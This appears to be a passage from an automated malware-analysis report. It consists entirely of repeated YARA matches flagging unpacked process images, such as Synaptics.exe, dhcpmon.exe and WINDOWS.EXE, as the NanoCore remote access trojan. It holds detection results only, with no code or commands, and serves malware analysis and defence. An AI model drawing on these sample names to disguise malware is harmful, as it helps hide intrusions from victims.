            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
